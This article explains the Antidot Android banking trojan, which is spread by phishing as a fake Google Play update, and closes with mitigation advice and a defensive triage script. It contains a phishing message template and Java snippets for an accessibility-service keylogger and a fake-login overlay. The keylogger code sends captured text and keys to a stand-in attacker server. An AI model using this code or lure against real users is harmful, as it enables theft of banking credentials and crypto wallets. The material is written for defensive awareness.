Antidot: The Android Malware Disguised as a Google Play Update

A new Android banking trojan named Antidot has emerged, spreading through phishing campaigns and masquerading as a Google Play update. This malware employs advanced obfuscation techniques to evade detection and performs activities such as stealing banking credentials, cryptocurrency wallet details, and login information from messaging and email applications.

This article explores Antidot’s attack techniques, its malicious code structure, and countermeasures to prevent infection.


Antidot’s Attack Chain

1. Infection via Phishing

The malware is distributed through phishing messages containing a fake update link that prompts users to install a security update for Google Play.

Example of a Phishing Message:

[Google Security Update]
Your device is vulnerable! Install the latest Google Play update to protect your account:

🔗 https://secure-update-googleplay[.]com

Failure to install this update may result in account suspension.

Once the user clicks on the malicious link, they are redirected to a website that delivers the malware APK, disguised as a legitimate update.


2. Abuse of Android Accessibility Services

After installation, Antidot abuses Android Accessibility Services to gain control over the device, allowing it to:

  • Perform overlay attacks
  • Capture keystrokes (keylogging)
  • Grant itself additional permissions

Malicious Code to Enable Accessibility Services Exploitation:

// Illustrative service: every UI event Android reports to an accessibility
// service is treated as keystroke data and forwarded off-device.
public class AccessibilityExploit extends AccessibilityService {
    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        // getText() returns the text of the view that fired the event (a list of CharSequence)
        String capturedText = event.getText().toString();
        Log.d("KeyLogger", "Captured: " + capturedText);
        sendDataToServer(capturedText);
    }

    // Exfiltrates the captured text to the C2 server on a background thread
    private void sendDataToServer(String data) {
        new Thread(() -> {
            try {
                URL url = new URL("https://attacker-server[.]com/steal");
                HttpURLConnection conn = (HttpURLConnection) url.openConnection();
                conn.setRequestMethod("POST");
                conn.setDoOutput(true);
                OutputStream os = conn.getOutputStream();
                os.write(data.getBytes());
                os.close();
            } catch (Exception e) {
                e.printStackTrace();
            }
        }).start();
    }

    @Override
    public void onInterrupt() {}
}

This code snippet captures user input from text fields and transmits it to a command-and-control (C2) server.


3. Overlay Attacks

Antidot uses overlay attacks to steal banking credentials by displaying a fake login page over legitimate banking apps. Users unknowingly enter their credentials, which are then sent to the attacker.

Example Code for Overlay Attack:

// TYPE_APPLICATION_OVERLAY windows draw on top of other apps and require the
// SYSTEM_ALERT_WINDOW ("display over other apps") permission, which is why that
// permission is worth auditing on a suspect device.
WindowManager.LayoutParams params = new WindowManager.LayoutParams(
    WindowManager.LayoutParams.MATCH_PARENT,
    WindowManager.LayoutParams.MATCH_PARENT,
    WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY,
    WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE,
    PixelFormat.TRANSLUCENT
);

// fake_login mimics the targeted bank's sign-in screen; windowManager is assumed
// to have been obtained from the context earlier
View fakeLoginView = LayoutInflater.from(context).inflate(R.layout.fake_login, null);
windowManager.addView(fakeLoginView, params);

This malicious code overlays a fake login screen when a user opens a targeted banking app.


4. Keylogging for Cryptocurrency Theft

Many cryptocurrency wallet apps use PIN codes or private keys for authentication. Antidot captures this data via keylogging.

Example Code for Keylogging Cryptocurrency Transactions:

public class Keylogger extends AccessibilityService {
    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        // Only react to edits in text fields, which is where PINs and keys are typed
        if (event.getEventType() == AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED) {
            String typedText = event.getText().toString();
            sendToC2(typedText);
        }
    }

    @Override
    public void onInterrupt() {}

    // Synchronous OkHttp POST; execute() throws a checked IOException, so it must be caught
    private void sendToC2(String data) {
        try {
            RequestBody body = RequestBody.create(data, MediaType.parse("text/plain"));
            new OkHttpClient().newCall(new Request.Builder()
                .url("https://attacker-server[.]com/crypto").post(body).build()).execute();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

This code logs text input changes and sends the collected private keys or credentials to the attacker’s server.


Evading Detection

Antidot employs multiple evasion techniques, including:

  • Obfuscation: Using tools like ProGuard to make code analysis difficult.
  • Encryption: Encrypting stolen data before transmission.
  • Code Injection: Injecting malicious code dynamically to bypass signature-based detection.

Example of Simple Obfuscation:

// Despite the name, this only reverses Base64 encoding; no key is involved
public String decryptData(String encryptedData) {
    return new String(Base64.decode(encryptedData, Base64.DEFAULT));
}

This keeps the C2 addresses and other constants out of a plain strings dump, which is enough to defeat naive static inspection. Base64 is an encoding rather than encryption, though, and an analyst who locates the decode routine recovers the data immediately.


Mitigation Strategies

To protect against Antidot and similar malware, users and organizations should adopt the following security measures:

1. Avoid Sideloading Apps

  • Only install apps from the Google Play Store and avoid APKs from untrusted sources.

2. Disable Accessibility Access for Untrusted Apps

  • Navigate to Settings → Accessibility and disable access for unfamiliar apps.

3. Use Google Play Protect

  • Enable Google Play Protect for real-time app scanning.

4. Be Wary of Phishing Messages

  • Avoid clicking on links in SMS, emails, or social media messages that prompt downloads.

5. Implement Two-Factor Authentication (2FA)

  • Use 2FA apps like Google Authenticator instead of SMS-based authentication.

6. Monitor Device Permissions

  • Regularly review app permissions and revoke unnecessary access.
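As an added example, not code from the article, here is a small Python triage script that applies items 2 and 6 to the output of two adb commands: it flags every package holding accessibility access that is not on an allowlist, and raises the severity when the same package also has the SYSTEM_ALERT_WINDOW (overlay) permission, which is exactly the combination Antidot relies on. The adb output, package names and allowlist are constructed samples.

```python
import re

# Constructed sample of `adb shell settings get secure enabled_accessibility_services`.
# The real value is a ':'-separated list of package/ServiceClass entries, or "null".
ENABLED_A11Y_SAMPLE = (
    "com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService:"
    "com.update.googleplay.fake/com.update.googleplay.fake.AccessibilityExploit"
)

# Constructed samples of `adb shell appops get <pkg> SYSTEM_ALERT_WINDOW`, keyed by package.
APPOPS_SAMPLE = {
    "com.google.android.marvin.talkback": "No operations.",
    "com.update.googleplay.fake": "SYSTEM_ALERT_WINDOW: allow; time=+3m12s456ms ago",
    "com.example.bank": "SYSTEM_ALERT_WINDOW: deny",
}

# Packages the reviewer already trusts with accessibility access (assumption for this example).
ALLOWLIST = {"com.google.android.marvin.talkback"}


def parse_enabled_services(raw):
    """Return {package: service_class} from the settings value; "null" or "" means none."""
    raw = raw.strip()
    if raw in ("", "null"):
        return {}
    services = {}
    for entry in raw.split(":"):
        pkg, _, cls = entry.partition("/")
        if pkg:
            services[pkg] = cls
    return services


def overlay_allowed(appops_line):
    """True when appops reports the SYSTEM_ALERT_WINDOW op as allowed."""
    return re.search(r"SYSTEM_ALERT_WINDOW:\s*allow", appops_line) is not None


def triage(enabled_raw, appops_by_pkg, allowlist):
    """List unexpected accessibility services; overlay ability on top of that is rated high."""
    findings = []
    for pkg, cls in parse_enabled_services(enabled_raw).items():
        if pkg in allowlist:
            continue
        overlay = overlay_allowed(appops_by_pkg.get(pkg, ""))
        findings.append({"package": pkg, "service": cls, "overlay": overlay,
                         "severity": "high" if overlay else "medium"})
    return findings
```

On a real device, feed the two adb command outputs into triage() and review anything it returns against Settings → Accessibility and Settings → Apps → Display over other apps.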

Conclusion

Antidot is a sophisticated Android malware that poses a severe threat to mobile banking and cryptocurrency users. By leveraging phishing, overlay attacks, keylogging, and advanced obfuscation, it effectively steals sensitive information.

Implementing security best practices such as avoiding sideloaded apps, monitoring permissions, and using 2FA can mitigate the risk of infection. Organizations should also educate users about phishing threats to prevent the spread of such malware.

By staying informed and vigilant, users can defend themselves against Antidot and other evolving cyber threats.

Stay safe and keep your Android devices secure!